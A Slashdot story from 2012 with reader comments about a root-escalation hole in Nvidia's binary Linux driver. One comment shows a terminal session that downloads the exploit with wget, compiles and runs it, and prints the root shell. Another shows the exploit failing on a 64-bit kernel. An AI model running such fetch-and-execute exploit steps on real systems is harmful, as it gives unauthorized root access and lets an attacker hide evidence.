Forgot your password?
typodupeerror
Security Linux

Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole 180

Posted by Unknown Lamer
from the rms-gazes-upon-you-smugly dept.
An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
This discussion has been archived. No new comments can be posted.

Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

Comments Filter:
  • Re:A view to a kill. (Score:5, Informative)

    by greg1104 (461138) <gsmith@gregsmith.com> on Wednesday August 01, 2012 @01:42PM (#40845101) Homepage

    VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

  • works here (Score:5, Informative)

    by Anonymous Coward on Wednesday August 01, 2012 @01:50PM (#40845239)

    It's certainly legit..

    c@v:~$
    c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
    2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
    c@v:~$ mv 86747-001.bin nvid-root.c
    c@v:~$ gcc nvid-root.c -o nvid-root
    c@v:~$ ./nvid-root
    [*] IDT offset at 0xc1808000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 32-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xc18086e0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    [*] Have root, will travel..
    sh-4.2#
    sh-4.2#

    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
    sh-4.2#

    sh-4.2# lsb_release -a
    LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
    Distributor ID: Ubuntu
    Description: Ubuntu 12.04 LTS
    Release: 12.04
    Codename: precise

    sh-4.2# uname -a
    Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
    sh-4.2#

  • by nedlohs (1335013) on Wednesday August 01, 2012 @01:51PM (#40845255)

    Yeah you don't get more flimsy evidence than a working exploit.

  • Re:works here (Score:5, Informative)

    by dmitrygr (736758) <dmitrygr@gmail.com> on Wednesday August 01, 2012 @02:14PM (#40845707) Homepage
    64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

    [*] IDT offset at 0xffffffff81b60000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 64-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xffffffff81b60dc0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    callsetroot returned fffffffffffffffe (-2)
    [*] Failed to get root.

  • Re:A view to a kill. (Score:3, Informative)

    by Desler (1608317) on Wednesday August 01, 2012 @02:17PM (#40845759)

    Windows 7 still includes a VGA video driver.

  • by Jerry Atrick (2461566) on Wednesday August 01, 2012 @02:37PM (#40846071)

    Frankly a root exploit is one of their lesser sins.

    Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

    You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

    First the spent months claiming there was no bug.
    Then they spent months claiming they'd fixed it (they hadn't).
    Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

    Over a year of data loss for anyone that believed them.

    Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

  • by RedDeadThumb (1826340) on Wednesday August 01, 2012 @04:24PM (#40847675)
    Amen! I had a hell of a time trying to report a bug in the ATI driver as well. And how do you report a bug to netflix? All company web front pages should have big button that says "report bug". People are out here doing free QA for them and they aren't taking advantage. Plus I actually get pissed when I cannot report a bug. And I know I am not alone here, so it is bad PR.
  • by Carewolf (581105) on Wednesday August 01, 2012 @05:22PM (#40848465) Homepage

    I think they might have a culture of not listening. The chief maintainer of nvidia's official forums, posted after Linus outburst a series of post about how Linus complaints had cause "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.

    Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??

Kill Ugly Processor Architectures - Karl Lehenbauer

Working...